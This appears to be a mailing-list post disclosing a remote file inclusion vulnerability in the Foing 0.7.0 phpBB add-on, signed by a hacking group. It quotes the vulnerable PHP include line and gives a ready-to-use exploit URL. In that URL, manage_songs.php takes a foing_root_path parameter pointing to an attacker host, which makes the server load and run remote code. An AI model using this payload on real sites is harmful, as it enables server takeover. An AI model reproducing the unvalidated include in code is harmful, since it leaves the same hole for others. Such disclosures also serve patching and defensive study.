<<< Date Index >>>     <<< Thread Index >>>

Foing (manage_songs.php) Remote File Inclusion[phpBB]

# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire@xxxxxxxxxxxxxxxx & msn: darkfire@xxxxxxxxxxxxxxx
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous 

---------------------------------------------------------------------

Vulnerable code :

include($foing_root_path . 'includes/common.php');

---------------------------------------------------------------------

http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks